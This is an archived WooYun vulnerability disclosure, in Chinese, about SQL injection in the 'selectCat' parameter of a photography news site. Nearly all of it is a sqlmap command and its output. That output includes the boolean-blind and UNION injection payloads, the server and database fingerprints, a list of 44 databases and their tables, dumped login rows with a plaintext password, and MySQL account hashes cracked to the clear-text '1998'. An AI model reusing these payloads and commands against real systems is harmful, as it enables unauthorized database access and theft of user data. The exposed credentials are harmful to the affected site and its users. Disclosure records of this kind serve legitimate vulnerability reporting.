乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
攝影可以有很多風格,其實有些所謂風格,是基於地理位置和自然環境的不同而出現。
地址:http://**.**.**.**/news/newslist.php?selectCat=3
$ python sqlmap.py -u "http://**.**.**.**/news/newslist.php?selectCat=3" -p selectCat --technique=BU --random-agent --batch --no-cast -D photonews -T jk_loguser -C u,p,ip,date --dump --start 1 --stop 5
Database: photonews+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| jk_loguser | 4945522 |
展示其中的小部分数据:
Database: photonewsTable: jk_loguser[4 entries]+---------+------------+-------------+----------------+| u | date | p | ip |+---------+------------+-------------+----------------+| | 2005-12-15 | jk: | **.**.**.** || | 2005-12-15 | jk: | **.**.**.** || | 2005-12-15 | jk: | **.**.**.** || netalex | 2005-12-15 | jk:12344312 | **.**.**.** |+---------+------------+-------------+----------------+
---Parameter: selectCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectCat=3 AND 4996=4996 Type: UNION query Title: MySQL UNION query (56) - 10 columns Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#---web server operating system: FreeBSDweb application technology: PHP 5.3.11, Apache 2.2.22back-end DBMS: MySQL >= 5.0.0current user: 'jacky@localhost'current user is DBA: Truedatabase management system users [8]:[*] ''@'localhost'[*] ''@'**.**.**.**'[*] 'jacky'@'localhost'[*] 'root'@'**.**.**.**'[*] 'root'@'::1'[*] 'root'@'localhost'[*] 'root'@'**.**.**.**'[*] 'shop'@'localhost'database management system users password hashes:[*] jacky [1]: password hash: *285B89EAF52B50EC0B88D65D1BCDAF2D23A8B6BF clear-text password: 1998[*] root [2]: password hash: *285B89EAF52B50EC0B88D65D1BCDAF2D23A8B6BF clear-text password: 1998 password hash: NULL[*] shop [1]: password hash: *04B1AFC2D736152C4ACB6796B56E66E174F331D7sqlmap resumed the following injection point(s) from stored session:---Parameter: selectCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectCat=3 AND 4996=4996 Type: UNION query Title: MySQL UNION query (56) - 10 columns Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#---web server operating system: FreeBSDweb application technology: PHP 5.3.11, Apache 2.2.22back-end DBMS: MySQL 5sqlmap resumed the following injection point(s) from stored session:---Parameter: selectCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectCat=3 AND 4996=4996 Type: UNION query Title: MySQL UNION query (56) - 10 columns Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#---web server operating system: FreeBSDweb application technology: PHP 5.3.11, Apache 2.2.22back-end DBMS: MySQL 5available databases [44]:[*] #mysql50#health-popart[*] betterhealth[*] betterhealthemag[*] faceapp_table[*] facebookgiftsys[*] forsale[*] healthlink[*] healthlinknew[*] healthlinkQuery[*] healthweb[*] information_schema[*] kidneyquestion[*] limesurvey2[*] mysql[*] performance_schema[*] photo[*] photo2[*] photonew2[*] photonews[*] photonews_new[*] photonewweb[*] photoold[*] photoshop[*] photoshop_hk[*] popartdb[*] poparttest[*] shop[*] shop2[*] shopnewver[*] shopvernew[*] test[*] testwordpress3[*] ucenter[*] ucenter2[*] uchome[*] uchome2[*] wacoal[*] wacoal_2012[*] wacoal_2013[*] wacoal_2014[*] wacoal_2015[*] webalbum[*] wordpresstest[*] wordpresstest2sqlmap resumed the following injection point(s) from stored session:---Parameter: selectCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectCat=3 AND 4996=4996 Type: UNION query Title: MySQL UNION query (56) - 10 columns Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#---web server operating system: FreeBSDweb application technology: PHP 5.3.11, Apache 2.2.22back-end DBMS: MySQL 5current database: 'photonews'sqlmap resumed the following injection point(s) from stored session:---Parameter: selectCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectCat=3 AND 4996=4996 Type: UNION query Title: MySQL UNION query (56) - 10 columns Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#---web server operating system: FreeBSDweb application technology: PHP 5.3.11, Apache 2.2.22back-end DBMS: MySQL 5Database: photonews+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| jk_loguser | 4945522 || pcphoto_iDollar | 366295 || pcphoto_forumarticle | 193014 || pcphoto_camerafield | 46694 || nuke_users | 34274 || pcphoto_memberlevel | 25409 || blog_upload_data | 18790 || pcphoto_photographvote | 15634 || pcphoto_photographphoto | 12027 || gamepoint | 11170 || blog_msg_data | 6556 || pcphoto_privatemessage | 6264 || blog_reply_data | 6125 || pcphoto_photoshowphoto | 5652 || pcphoto_libraryphoto | 3632 || pcphoto_photoshowvote | 3123 || pcphoto_userarticlevote | 2662 || blog_config_data | 2069 || blog_user_data | 2069 || blog_hit_data | 2068 || hkphoto | 1675 || pcphoto_newsarticle | 1402 || blog_msgnum_data | 1336 || pcphoto_libraryauth | 1273 || sonycontest | 1217 || talklog | 1187 || sonycontest2 | 1150 || pcphoto_cameraphoto | 1017 || pcphoto_newsarticle3 | 1000 || talk_epson | 944 || vitagreencontest | 903 || pcphoto_photoshowmember | 828 || pcphoto_cameravote | 739 || pcphoto_photoshowalbum | 702 || pcphoto_photoshowalbum2 | 694 || upload_data | 557 || pcphoto_camera | 489 || blog_link_data | 436 || webscan | 395 || upload_data_news | 386 || book_data | 385 || buyer_history | 336 || bwseminar | 328 || editor_data | 305 || digitdaily | 298 || olympus_resubmit | 294 || centerphoto | 290 || shekcontest | 262 || olympus_event | 233 || `20years` | 232 || jvc_event | 229 || maleonntalk | 229 || nikond700 | 223 || shooting | 211 || pcphoto_download | 204 || phototalk | 202 || blog_taker_data | 174 || sony_event | 162 || pcphoto_userarticle | 150 || olympus420 | 141 || adobe_event | 137 || phototalk2 | 137 || photoshopcs | 131 || newsonline_data | 127 || pcphoto_camerafieldtable | 125 || chkcontest | 120 || pcphoto_photographcatalog | 115 || dc100 | 84 || buyer_address | 74 || forum_config | 73 || book_contact | 60 || chinaphoto | 59 || pcphoto_auctionbuyer | 56 || d90 | 54 || award_data | 53 || pcphoto_auction | 52 || photoshopcs2 | 48 || pcphoto_forumtopic | 47 || bookorder2 | 45 || bookorder | 43 || d_letter | 43 || pcphoto_libraryalbum | 40 || pcphoto_modelbm | 39 || carddate | 35 || site_lock | 33 || pcphoto_auctioncatalog | 32 || sonya900_2 | 27 || pcphoto_cameracatalog | 26 || list_show | 23 || pcphoto_newscatalog | 22 || pcphoto_auctionvote | 20 || magtalk | 18 || nuke_users3 | 18 || sonya900 | 16 || photo2005_photographphoto | 14 || `23years` | 13 || changeforum | 13 || pcphoto_auctionwant | 13 || blog_photo_data | 12 || blog_photokind_data | 12 || pma_gift | 11 || blog_skin_data | 10 || newsonline_catalog | 10 || book_contact_msg | 9 || blog_photoac_data | 8 || blog_photocfg_data | 8 || digitdailycatalog | 7 || pcphoto_forumauth | 7 || book_magazine | 5 || pcphoto_downloadcatalog | 5 || tempmember | 5 || pcphoto_administrator | 4 || pcphoto_auctioncategory | 4 || pcphoto_librarycatalog | 4 || pcphoto_modelbmcatalog | 4 || pcphoto_newsauth | 4 || pcphoto_newsletter | 4 || pcphoto_pointslevel | 4 || pcphoto_userarticlecatalog | 4 || newsonline_news | 3 || wish_user | 3 || testtable | 2 || blog_school_data | 1 || blog_schoolnews_data | 1 || memberdate | 1 || newsonline_member | 1 || pcphoto_group | 1 || photo2005_photographcatalog | 1 || ticket | 1 |+-----------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: selectCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectCat=3 AND 4996=4996 Type: UNION query Title: MySQL UNION query (56) - 10 columns Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#---web server operating system: FreeBSDweb application technology: PHP 5.3.11, Apache 2.2.22back-end DBMS: MySQL 5Database: photonewsTable: jk_loguser[4 columns]+--------+-------------+| Column | Type |+--------+-------------+| date | date || ip | varchar(20) || p | varchar(20) || u | varchar(20) |+--------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: selectCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectCat=3 AND 4996=4996 Type: UNION query Title: MySQL UNION query (56) - 10 columns Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#---web server operating system: FreeBSDweb application technology: PHP 5.3.11, Apache 2.2.22back-end DBMS: MySQL 5Database: photonewsTable: jk_loguser[4 entries]+---------+------------+-------------+----------------+| u | date | p | ip |+---------+------------+-------------+----------------+| | 2005-12-15 | jk: | **.**.**.** || | 2005-12-15 | jk: | **.**.**.** || | 2005-12-15 | jk: | **.**.**.** || netalex | 2005-12-15 | jk:12344312 | **.**.**.** |+---------+------------+-------------+----------------+
上WAF。
危害等级:中
漏洞Rank:6
确认时间:2015-11-27 15:12
Referred to related parties.
暂无